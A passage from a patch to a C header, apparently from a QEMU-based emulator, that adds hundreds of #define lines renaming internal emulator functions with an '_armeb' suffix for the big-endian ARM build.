memory_region_add_subregion_overlap memory_region_add_subregion_overlap_armeb +#define memory_region_big_endian memory_region_big_endian_armeb +#define memory_region_clear_pending memory_region_clear_pending_armeb +#define memory_region_del_subregion memory_region_del_subregion_armeb +#define memory_region_destructor_alias memory_region_destructor_alias_armeb +#define memory_region_destructor_none memory_region_destructor_none_armeb +#define memory_region_destructor_ram memory_region_destructor_ram_armeb +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_armeb +#define memory_region_dispatch_read memory_region_dispatch_read_armeb +#define memory_region_dispatch_read1 memory_region_dispatch_read1_armeb +#define memory_region_dispatch_write memory_region_dispatch_write_armeb +#define memory_region_escape_name memory_region_escape_name_armeb +#define memory_region_finalize memory_region_finalize_armeb +#define memory_region_find memory_region_find_armeb +#define memory_region_get_addr memory_region_get_addr_armeb +#define memory_region_get_alignment memory_region_get_alignment_armeb +#define memory_region_get_container memory_region_get_container_armeb +#define memory_region_get_fd memory_region_get_fd_armeb +#define memory_region_get_may_overlap memory_region_get_may_overlap_armeb +#define memory_region_get_priority memory_region_get_priority_armeb +#define memory_region_get_ram_addr memory_region_get_ram_addr_armeb +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_armeb +#define memory_region_get_size memory_region_get_size_armeb +#define memory_region_info memory_region_info_armeb +#define memory_region_init memory_region_init_armeb +#define memory_region_init_alias memory_region_init_alias_armeb +#define memory_region_initfn memory_region_initfn_armeb +#define memory_region_init_io memory_region_init_io_armeb +#define memory_region_init_ram memory_region_init_ram_armeb +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_armeb +#define memory_region_init_reservation memory_region_init_reservation_armeb +#define memory_region_is_iommu memory_region_is_iommu_armeb +#define memory_region_is_logging memory_region_is_logging_armeb +#define memory_region_is_mapped memory_region_is_mapped_armeb +#define memory_region_is_ram memory_region_is_ram_armeb +#define memory_region_is_rom memory_region_is_rom_armeb +#define memory_region_is_romd memory_region_is_romd_armeb +#define memory_region_is_skip_dump memory_region_is_skip_dump_armeb +#define memory_region_is_unassigned memory_region_is_unassigned_armeb +#define memory_region_name memory_region_name_armeb +#define memory_region_need_escape memory_region_need_escape_armeb +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_armeb +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_armeb +#define memory_region_present memory_region_present_armeb +#define memory_region_read_accessor memory_region_read_accessor_armeb +#define memory_region_readd_subregion memory_region_readd_subregion_armeb +#define memory_region_ref memory_region_ref_armeb +#define memory_region_resolve_container memory_region_resolve_container_armeb +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_armeb +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_armeb +#define memory_region_set_address memory_region_set_address_armeb +#define memory_region_set_alias_offset memory_region_set_alias_offset_armeb +#define memory_region_set_enabled memory_region_set_enabled_armeb +#define memory_region_set_readonly memory_region_set_readonly_armeb +#define memory_region_set_skip_dump memory_region_set_skip_dump_armeb +#define memory_region_size memory_region_size_armeb +#define memory_region_to_address_space memory_region_to_address_space_armeb +#define memory_region_transaction_begin memory_region_transaction_begin_armeb +#define memory_region_transaction_commit memory_region_transaction_commit_armeb +#define memory_region_unref memory_region_unref_armeb +#define memory_region_update_container_subregions memory_region_update_container_subregions_armeb +#define memory_region_write_accessor memory_region_write_accessor_armeb +#define memory_region_wrong_endianness memory_region_wrong_endianness_armeb +#define memory_try_enable_merging memory_try_enable_merging_armeb +#define module_call_init module_call_init_armeb +#define module_load module_load_armeb +#define mpidr_cp_reginfo mpidr_cp_reginfo_armeb +#define mpidr_read mpidr_read_armeb +#define msr_mask msr_mask_armeb +#define mul128By64To192 mul128By64To192_armeb +#define mul128To256 mul128To256_armeb +#define mul64To128 mul64To128_armeb +#define muldiv64 muldiv64_armeb +#define neon_2rm_is_float_op neon_2rm_is_float_op_armeb +#define neon_2rm_sizes neon_2rm_sizes_armeb +#define neon_3r_sizes neon_3r_sizes_armeb +#define neon_get_scalar neon_get_scalar_armeb +#define neon_load_reg neon_load_reg_armeb +#define neon_load_reg64 neon_load_reg64_armeb +#define neon_load_scratch neon_load_scratch_armeb +#define neon_ls_element_type neon_ls_element_type_armeb +#define neon_reg_offset neon_reg_offset_armeb +#define neon_store_reg neon_store_reg_armeb +#define neon_store_reg64 neon_store_reg64_armeb +#define neon_store_scratch neon_store_scratch_armeb +#define new_ldst_label new_ldst_label_armeb +#define next_list next_list_armeb +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_armeb +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_armeb +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_armeb +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_armeb +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_armeb +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_armeb +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_armeb +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_armeb +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_armeb +#define not_v6_cp_reginfo not_v6_cp_reginfo_armeb +#define not_v7_cp_reginfo not_v7_cp_reginfo_armeb +#define not_v8_cp_reginfo not_v8_cp_reginfo_armeb +#define object_child_foreach object_child_foreach_armeb +#define object_class_foreach object_class_foreach_armeb +#define object_class_foreach_tramp object_class_foreach_tramp_armeb +#define object_class_get_list object_class_get_list_armeb +#define object_class_get_list_tramp object_class_get_list_tramp_armeb +#define object_class_get_parent object_class_get_parent_armeb +#define object_deinit object_deinit_armeb +#define object_dynamic_cast object_dynamic_cast_armeb +#define object_finalize object_finalize_armeb +#define object_finalize_child_property object_finalize_child_property_armeb +#define object_get_child_property object_get_child_property_armeb +#define object_get_link_property object_get_link_property_armeb +#define object_get_root object_get_root_armeb +#define object_initialize_with_type object_initialize_with_type_armeb +#define object_init_with_type object_init_with_type_armeb +#define object_instance_init object_instance_init_armeb +#define object_new_with_type object_new_with_type_armeb +#define object_post_init_with_type object_post_init_with_type_armeb +#define object_property_add_alias object_property_add_alias_armeb +#define object_property_add_link object_property_add_link_armeb +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_armeb +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_armeb +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_armeb +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_armeb +#define object_property_allow_set_link object_property_allow_set_link_armeb +#define object_property_del object_property_del_armeb +#define object_property_del_all object_property_del_all_armeb +#define object_property_find object_property_find_armeb +#define object_property_get object_property_get_armeb +#define object_property_get_bool object_property_get_bool_armeb +#define object_property_get_int object_property_get_int_armeb +#define object_property_get_link object_property_get_link_armeb +#define object_property_get_qobject object_property_get_qobject_armeb +#define object_property_get_str object_property_get_str_armeb +#define object_property_get_type object_property_get_type_armeb +#define object_property_is_child object_property_is_child_armeb +#define object_property_set object_property_set_armeb +#define object_property_set_description object_property_set_description_armeb +#define object_property_set_link object_property_set_link_armeb +#define object_property_set_qobject object_property_set_qobject_armeb +#define object_release_link_property object_release_link_property_armeb +#define object_resolve_abs_path object_resolve_abs_path_armeb +#define object_resolve_child_property object_resolve_child_property_armeb +#define object_resolve_link object_resolve_link_armeb +#define object_resolve_link_property object_resolve_link_property_armeb +#define object_resolve_partial_path object_resolve_partial_path_armeb +#define object_resolve_path object_resolve_path_armeb +#define object_resolve_path_component object_resolve_path_component_armeb +#define object_resolve_path_type object_resolve_path_type_armeb +#define object_set_link_property object_set_link_property_armeb +#define object_unparent object_unparent_armeb +#define omap_cachemaint_write omap_cachemaint_write_armeb +#define omap_cp_reginfo omap_cp_reginfo_armeb +#define omap_threadid_write omap_threadid_write_armeb +#define omap_ticonfig_write omap_ticonfig_write_armeb +#define omap_wfi_write omap_wfi_write_armeb +#define op_bits op_bits_armeb +#define open_modeflags open_modeflags_armeb +#define op_to_mov op_to_mov_armeb +#define op_to_movi op_to_movi_armeb +#define output_type_enum output_type_enum_armeb +#define packFloat128 packFloat128_armeb +#define packFloat16 packFloat16_armeb +#define packFloat32 packFloat32_armeb +#define packFloat64 packFloat64_armeb +#define packFloatx80 packFloatx80_armeb +#define page_find page_find_armeb +#define page_find_alloc page_find_alloc_armeb +#define page_flush_tb page_flush_tb_armeb +#define page_flush_tb_1 page_flush_tb_1_armeb +#define page_init page_init_armeb +#define page_size_init page_size_init_armeb +#define par par_armeb +#define parse_array parse_array_armeb +#define parse_error parse_error_armeb +#define parse_escape parse_escape_armeb +#define parse_keyword parse_keyword_armeb +#define parse_literal parse_literal_armeb +#define parse_object parse_object_armeb +#define parse_optional parse_optional_armeb +#define parse_option_bool parse_option_bool_armeb +#define parse_option_number parse_option_number_armeb +#define parse_option_size parse_option_size_armeb +#define parse_pair parse_pair_armeb +#define parser_context_free parser_context_free_armeb +#define parser_context_new parser_context_new_armeb +#define parser_context_peek_token parser_context_peek_token_armeb +#define parser_context_pop_token parser_context_pop_token_armeb +#define parser_context_restore parser_context_restore_armeb +#define parser_context_save parser_context_save_armeb +#define parse_str parse_str_armeb +#define parse_type_bool parse_type_bool_armeb +#define parse_type_int parse_type_int_armeb +#define parse_type_number parse_type_number_armeb +#define parse_type_size parse_type_size_armeb +#define parse_type_str parse_type_str_armeb +#define parse_value parse_value_armeb +#define par_write par_write_armeb +#define patch_reloc patch_reloc_armeb +#define phys_map_node_alloc phys_map_node_alloc_armeb +#define phys_map_node_reserve phys_map_node_reserve_armeb +#define phys_mem_alloc phys_mem_alloc_armeb +#define phys_mem_set_alloc phys_mem_set_alloc_armeb +#define phys_page_compact phys_page_compact_armeb +#define phys_page_compact_all phys_page_compact_all_armeb +#define phys_page_find phys_page_find_armeb +#define phys_page_set phys_page_set_armeb +#define phys_page_set_level phys_page_set_level_armeb +#define phys_section_add phys_section_add_armeb +#define phys_section_destroy phys_section_destroy_armeb +#define phys_sections_free phys_sections_free_armeb +#define pickNaN pickNaN_armeb +#define pickNaNMulAdd pickNaNMulAdd_armeb +#define pmccfiltr_write pmccfiltr_write_armeb +#define pmccntr_read pmccntr_read_armeb +#define pmccntr_sync pmccntr_sync_armeb +#define pmccntr_write pmccntr_write_armeb +#define pmccntr_write32 pmccntr_write32_armeb +#define pmcntenclr_write pmcntenclr_write_armeb +#define pmcntenset_write pmcntenset_write_armeb +#define pmcr_write pmcr_write_armeb +#define pmintenclr_write pmintenclr_write_armeb +#define pmintenset_write pmintenset_write_armeb +#define pmovsr_write pmovsr_write_armeb +#define pmreg_access pmreg_access_armeb +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_armeb +#define pmsav5_data_ap_read pmsav5_data_ap_read_armeb +#define pmsav5_data_ap_write pmsav5_data_ap_write_armeb +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_armeb +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_armeb +#define pmuserenr_write pmuserenr_write_armeb +#define pmxevtyper_write pmxevtyper_write_armeb +#define print_type_bool print_type_bool_armeb +#define print_type_int print_type_int_armeb +#define print_type_number print_type_number_armeb +#define print_type_size print_type_size_armeb +#define print_type_str print_type_str_armeb +#define propagateFloat128NaN propagateFloat128NaN_armeb +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_armeb +#define propagateFloat32NaN propagateFloat32NaN_armeb +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_armeb +#define propagateFloat64NaN propagateFloat64NaN_armeb +#define propagateFloatx80NaN propagateFloatx80NaN_armeb +#define property_get_alias property_get_alias_armeb +#define property_get_bool property_get_bool_armeb +#define property_get_str property_get_str_armeb +#define property_get_uint16_ptr property_get_uint16_ptr_armeb +#define property_get_uint32_ptr property_get_uint32_ptr_armeb +#define property_get_uint64_ptr property_get_uint64_ptr_armeb +#define property_get_uint8_ptr property_get_uint8_ptr_armeb +#define property_release_alias property_release_alias_armeb +#define property_release_bool property_release_bool_armeb +#define property_release_str property_release_str_armeb +#define property_resolve_alias property_resolve_alias_armeb +#define property_set_alias property_set_alias_armeb +#define property_set_bool property_set_bool_armeb +#define property_set_str property_set_str_armeb +#define pstate_read pstate_read_armeb +#define pstate_write pstate_write_armeb +#define pxa250_initfn pxa250_initfn_armeb +#define pxa255_initfn pxa255_initfn_armeb +#define pxa260_initfn pxa260_initfn_armeb +#define pxa261_initfn pxa261_initfn_armeb +#define pxa262_initfn pxa262_initfn_armeb +#define pxa270a0_initfn pxa270a0_initfn_armeb +#define pxa270a1_initfn pxa270a1_initfn_armeb +#define pxa270b0_initfn pxa270b0_initfn_armeb +#define pxa270b1_initfn pxa270b1_initfn_armeb +#define pxa270c0_initfn pxa270c0_initfn_armeb +#define pxa270c5_initfn pxa270c5_initfn_armeb +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_armeb +#define qapi_dealloc_end_list qapi_dealloc_end_list_armeb +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_armeb +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_armeb +#define qapi_dealloc_next_list qapi_dealloc_next_list_armeb +#define qapi_dealloc_pop qapi_dealloc_pop_armeb +#define qapi_dealloc_push qapi_dealloc_push_armeb +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_armeb +#define qapi_dealloc_start_list qapi_dealloc_start_list_armeb +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_armeb +#define qapi_dealloc_start_union qapi_dealloc_start_union_armeb +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_armeb +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_armeb +#define qapi_dealloc_type_int qapi_dealloc_type_int_armeb +#define qapi_dealloc_type_number qapi_dealloc_type_number_armeb +#define qapi_dealloc_type_size qapi_dealloc_type_size_armeb +#define qapi_dealloc_type_str qapi_dealloc_type_str_armeb +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_armeb +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_armeb +#define qapi_free_boolList qapi_free_boolList_armeb +#define qapi_free_ErrorClassList qapi_free_ErrorClassList_armeb +#define qapi_free_int16List qapi_free_int16List_armeb +#define qapi_free_int32List qapi_free_int32List_armeb +#define qapi_free_int64List qapi_free_int64List_armeb +#define qapi_free_int8List qapi_free_int8List_armeb +#define qapi_free_intList qapi_free_intList_armeb +#define qapi_free_numberList qapi_free_numberList_armeb +#define qapi_free_strList qapi_free_strList_armeb +#define qapi_free_uint16List qapi_free_uint16List_armeb +#define qapi_free_uint32List qapi_free_uint32List_armeb +#define qapi_free_uint64List qapi_free_uint64List_armeb +#define qapi_free_uint8List qapi_free_uint8List_armeb +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_armeb +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_armeb +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_armeb +#define qbool_destroy_obj qbool_destroy_obj_armeb +#define qbool_from_int qbool_from_int_armeb +#define qbool_get_int qbool_get_int_armeb +#define qbool_type qbool_type_armeb +#define qbus_create qbus_create_armeb +#define qbus_create_inplace qbus_create_inplace_armeb +#define qbus_finalize qbus_finalize_armeb +#define qbus_initfn qbus_initfn_armeb +#define qbus_realize qbus_realize_armeb +#define qdev_create qdev_create_armeb +#define qdev_get_type qdev_get_type_armeb +#define qdev_register_types qdev_register_types_armeb +#define qdev_set_parent_bus qdev_set_parent_bus_armeb +#define qdev_try_create qdev_try_create_armeb +#define qdict_add_key qdict_add_key_armeb +#define qdict_array_split qdict_array_split_armeb +#define qdict_clone_shallow qdict_clone_shallow_armeb +#define qdict_del qdict_del_armeb +#define qdict_destroy_obj qdict_destroy_obj_armeb +#define qdict_entry_key qdict_entry_key_armeb +#define qdict_entry_value qdict_entry_value_armeb +#define qdict_extract_subqdict qdict_extract_subqdict_armeb +#define qdict_find qdict_find_armeb +#define qdict_first qdict_first_armeb +#define qdict_flatten qdict_flatten_armeb +#define qdict_flatten_qdict qdict_flatten_qdict_armeb +#define qdict_flatten_qlist qdict_flatten_qlist_armeb +#define qdict_get qdict_get_armeb +#define qdict_get_bool qdict_get_bool_armeb +#define qdict_get_double qdict_get_double_armeb +#define qdict_get_int qdict_get_int_armeb +#define qdict_get_obj qdict_get_obj_armeb +#define qdict_get_qdict qdict_get_qdict_armeb +#define qdict_get_qlist qdict_get_qlist_armeb +#define qdict_get_str qdict_get_str_armeb +#define qdict_get_try_bool qdict_get_try_bool_armeb +#define qdict_get_try_int qdict_get_try_int_armeb +#define qdict_get_try_str qdict_get_try_str_armeb +#define qdict_haskey qdict_haskey_armeb +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_armeb +#define qdict_iter qdict_iter_armeb +#define qdict_join qdict_join_armeb +#define qdict_new qdict_new_armeb +#define qdict_next qdict_next_armeb +#define qdict_next_entry qdict_next_entry_armeb +#define qdict_put_obj qdict_put_obj_armeb +#define qdict_size qdict_size_armeb +#define qdict_type qdict_type_armeb +#define qemu_clock_get_us qemu_clock_get_us_armeb +#define qemu_clock_ptr qemu_clock_ptr_armeb +#define qemu_clocks qemu_clocks_armeb +#define qemu_get_cpu qemu_get_cpu_armeb +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_armeb +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_armeb +#define qemu_get_ram_block qemu_get_ram_block_armeb +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_armeb +#define qemu_get_ram_fd qemu_get_ram_fd_armeb +#define qemu_get_ram_ptr qemu_get_ram_ptr_armeb +#define qemu_host_page_mask qemu_host_page_mask_armeb +#define qemu_host_page_size qemu_host_page_size_armeb +#define qemu_init_vcpu qemu_init_vcpu_armeb +#define qemu_ld_helpers qemu_ld_helpers_armeb +#define qemu_log_close qemu_log_close_armeb +#define qemu_log_enabled qemu_log_enabled_armeb +#define qemu_log_flush qemu_log_flush_armeb +#define qemu_loglevel_mask qemu_loglevel_mask_armeb +#define qemu_log_vprintf qemu_log_vprintf_armeb +#define qemu_oom_check qemu_oom_check_armeb +#define qemu_parse_fd qemu_parse_fd_armeb +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_armeb +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_armeb +#define qemu_ram_alloc qemu_ram_alloc_armeb +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_armeb +#define qemu_ram_foreach_block qemu_ram_foreach_block_armeb +#define qemu_ram_free qemu_ram_free_armeb +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_armeb +#define qemu_ram_ptr_length qemu_ram_ptr_length_armeb +#define qemu_ram_remap qemu_ram_remap_armeb +#define qemu_ram_setup_dump qemu_ram_setup_dump_armeb +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_armeb +#define qemu_real_host_page_size qemu_real_host_page_size_armeb +#define qemu_st_helpers qemu_st_helpers_armeb +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_armeb +#define qemu_try_memalign qemu_try_memalign_armeb +#define qentry_destroy qentry_destroy_armeb +#define qerror_human qerror_human_armeb +#define qerror_report qerror_report_armeb +#define qerror_report_err qerror_report_err_armeb +#define qfloat_destroy_obj qfloat_destroy_obj_armeb +#define qfloat_from_double qfloat_from_double_armeb +#define qfloat_get_double qfloat_get_double_armeb +#define qfloat_type qfloat_type_armeb +#define qint_destroy_obj qint_destroy_obj_armeb +#define qint_from_int qint_from_int_armeb +#define qint_get_int qint_get_int_armeb +#define qint_type qint_type_armeb +#define qlist_append_obj qlist_append_obj_armeb +#define qlist_copy qlist_copy_armeb +#define qlist_copy_elem qlist_copy_elem_armeb +#define qlist_destroy_obj qlist_destroy_obj_armeb +#define qlist_empty qlist_empty_armeb +#define qlist_entry_obj qlist_entry_obj_armeb +#define qlist_first qlist_first_armeb +#define qlist_iter qlist_iter_armeb +#define qlist_new qlist_new_armeb +#define qlist_next qlist_next_armeb +#define qlist_peek qlist_peek_armeb +#define qlist_pop qlist_pop_armeb +#define qlist_size qlist_size_armeb +#define qlist_size_iter qlist_size_iter_armeb +#define qlist_type qlist_type_armeb +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_armeb +#define qmp_input_end_list qmp_input_end_list_armeb +#define qmp_input_end_struct qmp_input_end_struct_armeb +#define qmp_input_get_next_type qmp_input_get_next_type_armeb +#define qmp_input_get_object qmp_input_get_object_armeb +#define qmp_input_get_visitor qmp_input_get_visitor_armeb +#define qmp_input_next_list qmp_input_next_list_armeb +#define qmp_input_optional qmp_input_optional_armeb +#define qmp_input_pop qmp_input_pop_armeb +#define qmp_input_push qmp_input_push_armeb +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_armeb +#define qmp_input_start_list qmp_input_start_list_armeb +#define qmp_input_start_struct qmp_input_start_struct_armeb +#define qmp_input_type_bool qmp_input_type_bool_armeb +#define qmp_input_type_int qmp_input_type_int_armeb +#define qmp_input_type_number qmp_input_type_number_armeb +#define qmp_input_type_str qmp_input_type_str_armeb +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_armeb +#define qmp_input_visitor_new qmp_input_visitor_new_armeb +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_armeb +#define qmp_output_add_obj qmp_output_add_obj_armeb +#define qmp_output_end_list qmp_output_end_list_armeb +#define qmp_output_end_struct qmp_output_end_struct_armeb +#define qmp_output_first qmp_output_first_armeb +#define qmp_output_get_qobject qmp_output_get_qobject_armeb +#define qmp_output_get_visitor qmp_output_get_visitor_armeb +#define qmp_output_last qmp_output_last_armeb +#define qmp_output_next_list qmp_output_next_list_armeb +#define qmp_output_pop qmp_output_pop_armeb +#define qmp_output_push_obj qmp_output_push_obj_armeb +#define qmp_output_start_list qmp_output_start_list_armeb +#define qmp_output_start_struct qmp_output_start_struct_armeb +#define qmp_output_type_bool qmp_output_type_bool_armeb +#define qmp_output_type_int qmp_output_type_int_armeb +#define qmp_output_type_number qmp_output_type_number_armeb +#define qmp_output_type_str qmp_output_type_str_armeb +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_armeb +#define qmp_output_visitor_new qmp_output_visitor_new_armeb +#define qobject_decref qobject_decref_armeb +#define qobject_to_qbool qobject_to_qbool_armeb +#define qobject_to_qdict qobject_to_qdict_armeb +#define qobject_to_qfloat qobject_to_qfloat_armeb +#define qobject_to_qint qobject_to_qint_armeb +#define qobject_to_qlist qobject_to_qlist_armeb +#define qobject_to_qstring qobject_to_qstring_armeb +#define qobject_type qobject_type_armeb +#define qstring_append qstring_append_armeb +#define qstring_append_chr qstring_append_chr_armeb +#define qstring_append_int qstring_append_int_armeb +#define qstring_destroy_obj qstring_destroy_obj_armeb +#define qstring_from_escaped_str qstring_from_escaped_str_armeb +#define qstring_from_str qstring_from_str_armeb +#define qstring_from_substr qstring_from_substr_armeb +#define qstring_get_length qstring_get_length_armeb +#define qstring_get_str qstring_get_str_armeb +#define qstring_new qstring_new_armeb +#define qstring_type qstring_type_armeb +#define ram_block_add ram_block_add_armeb +#define ram_size ram_size_armeb +#define range_compare range_compare_armeb +#define range_covers_byte range_covers_byte_armeb +#define range_get_last range_get_last_armeb +#define range_merge range_merge_armeb +#define ranges_can_merge ranges_can_merge_armeb +#define raw_read raw_read_armeb +#define raw_write raw_write_armeb +#define rcon rcon_armeb +#define read_raw_cp_reg read_raw_cp_reg_armeb +#define recip_estimate recip_estimate_armeb +#define recip_sqrt_estimate recip_sqrt_estimate_armeb +#define register_cp_regs_for_features register_cp_regs_for_features_armeb +#define register_multipage register_multipage_armeb +#define register_subpage register_subpage_armeb +#define register_tm_clones register_tm_clones_armeb +#define register_types_object register_types_object_armeb +#define regnames regnames_armeb +#define render_memory_region render_memory_region_armeb +#define reset_all_temps reset_all_temps_armeb +#define reset_temp reset_temp_armeb +#define rol32 rol32_armeb +#define rol64 rol64_armeb +#define ror32 ror32_armeb +#define ror64 ror64_armeb +#define roundAndPackFloat128 roundAndPackFloat128_armeb +#define roundAndPackFloat16 roundAndPackFloat16_armeb +#define roundAndPackFloat32 roundAndPackFloat32_armeb +#define roundAndPackFloat64 roundAndPackFloat64_armeb +#define roundAndPackFloatx80 roundAndPackFloatx80_armeb +#define roundAndPackInt32 roundAndPackInt32_armeb +#define roundAndPackInt64 roundAndPackInt64_armeb +#define roundAndPackUint64 roundAndPackUint64_armeb +#define round_to_inf round_to_inf_armeb +#define run_on_cpu run_on_cpu_armeb +#define s0 s0_armeb +#define S0 S0_armeb +#define s1 s1_armeb +#define S1 S1_armeb +#define sa1100_initfn sa1100_initfn_armeb +#define sa1110_initfn sa1110_initfn_armeb +#define save_globals save_globals_armeb +#define scr_write scr_write_armeb +#define sctlr_write sctlr_write_armeb +#define set_bit set_bit_armeb +#define set_bits set_bits_armeb +#define set_default_nan_mode set_default_nan_mode_armeb +#define set_feature set_feature_armeb +#define set_float_detect_tininess set_float_detect_tininess_armeb +#define set_float_exception_flags set_float_exception_flags_armeb +#define set_float_rounding_mode set_float_rounding_mode_armeb +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_armeb +#define set_flush_to_zero set_flush_to_zero_armeb +#define set_swi_errno set_swi_errno_armeb +#define sextract32 sextract32_armeb +#define sextract64 sextract64_armeb +#define shift128ExtraRightJamming shift128ExtraRightJamming_armeb +#define shift128Right shift128Right_armeb +#define shift128RightJamming shift128RightJamming_armeb +#define shift32RightJamming shift32RightJamming_armeb +#define shift64ExtraRightJamming shift64ExtraRightJamming_armeb +#define shift64RightJamming shift64RightJamming_armeb +#define shifter_out_im shifter_out_im_armeb +#define shortShift128Left shortShift128Left_armeb +#define shortShift192Left shortShift192Left_armeb +#define simple_mpu_ap_bits simple_mpu_ap_bits_armeb +#define size_code_gen_buffer size_code_gen_buffer_armeb +#define softmmu_lock_user softmmu_lock_user_armeb +#define softmmu_lock_user_string softmmu_lock_user_string_armeb +#define softmmu_tget32 softmmu_tget32_armeb +#define softmmu_tget8 softmmu_tget8_armeb +#define softmmu_tput32 softmmu_tput32_armeb +#define softmmu_unlock_user softmmu_unlock_user_armeb +#define sort_constraints sort_constraints_armeb +#define sp_el0_access sp_el0_access_armeb +#define spsel_read spsel_read_armeb +#define spsel_write spsel_write_armeb +#define start_list start_list_armeb +#define stb_p stb_p_armeb +#define stb_phys stb_phys_armeb +#define stl_be_p stl_be_p_armeb +#define stl_be_phys stl_be_phys_armeb +#define stl_he_p stl_he_p_armeb +#define stl_le_p stl_le_p_armeb +#define stl_le_phys stl_le_phys_armeb +#define stl_phys stl_phys_armeb +#define stl_phys_internal stl_phys_internal_armeb +#define stl_phys_notdirty stl_phys_notdirty_armeb +#define store_cpu_offset store_cpu_offset_armeb +#define store_reg store_reg_armeb +#define store_reg_bx store_reg_bx_armeb +#define store_reg_from_load store_reg_from_load_armeb +#define stq_be_p stq_be_p_armeb +#define stq_be_phys stq_be_phys_armeb +#define stq_he_p stq_he_p_armeb +#define stq_le_p stq_le_p_armeb +#define stq_le_phys stq_le_phys_armeb +#define stq_phys stq_phys_armeb +#define string_input_get_visitor string_input_get_visitor_armeb +#define string_input_visitor_cleanup string_input_visitor_cleanup_armeb +#define string_input_visitor_new string_input_visitor_new_armeb +#define strongarm_cp_reginfo strongarm_cp_reginfo_armeb +#define strstart strstart_armeb +#define strtosz strtosz_armeb +#define strtosz_suffix strtosz_suffix_armeb +#define stw_be_p stw_be_p_armeb +#define stw_be_phys stw_be_phys_armeb +#define stw_he_p stw_he_p_armeb +#define stw_le_p stw_le_p_armeb +#define stw_le_phys stw_le_phys_armeb +#define stw_phys stw_phys_armeb +#define stw_phys_internal stw_phys_internal_armeb +#define sub128 sub128_armeb +#define sub16_sat sub16_sat_armeb +#define sub16_usat sub16_usat_armeb +#define sub192 sub192_armeb +#define sub8_sat sub8_sat_armeb +#define sub8_usat sub8_usat_armeb +#define subFloat128Sigs subFloat128Sigs_armeb +#define subFloat32Sigs subFloat32Sigs_armeb +#define subFloat64Sigs subFloat64Sigs_armeb +#define subFloatx80Sigs subFloatx80Sigs_armeb +#define subpage_accepts subpage_accepts_armeb +#define subpage_init subpage_init_armeb +#define subpage_ops subpage_ops_armeb +#define subpage_read subpage_read_armeb +#define subpage_register subpage_register_armeb +#define subpage_write subpage_write_armeb +#define suffix_mul suffix_mul_armeb +#define swap_commutative swap_commutative_armeb +#define swap_commutative2 swap_commutative2_armeb +#define switch_mode switch_mode_armeb +#define switch_v7m_sp switch_v7m_sp_armeb +#define syn_aa32_bkpt syn_aa32_bkpt_armeb +#define syn_aa32_hvc syn_aa32_hvc_armeb +#define syn_aa32_smc syn_aa32_smc_armeb +#define syn_aa32_svc syn_aa32_svc_armeb +#define syn_breakpoint syn_breakpoint_armeb +#define sync_globals sync_globals_armeb +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_armeb +#define syn_cp14_rt_trap syn_cp14_rt_trap_armeb +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_armeb +#define syn_cp15_rt_trap syn_cp15_rt_trap_armeb +#define syn_data_abort syn_data_abort_armeb +#define syn_fp_access_trap syn_fp_access_trap_armeb +#define syn_insn_abort syn_insn_abort_armeb +#define syn_swstep syn_swstep_armeb +#define syn_uncategorized syn_uncategorized_armeb +#define syn_watchpoint syn_watchpoint_armeb +#define syscall_err syscall_err_armeb +#define system_bus_class_init system_bus_class_init_armeb +#define system_bus_info system_bus_info_armeb +#define t2ee_cp_reginfo t2ee_cp_reginfo_armeb +#define table_logic_cc table_logic_cc_armeb +#define target_parse_constraint target_parse_constraint_armeb +#define target_words_bigendian target_words_bigendian_armeb +#define tb_add_jump tb_add_jump_armeb +#define tb_alloc tb_alloc_armeb +#define tb_alloc_page tb_alloc_page_armeb +#define tb_check_watchpoint 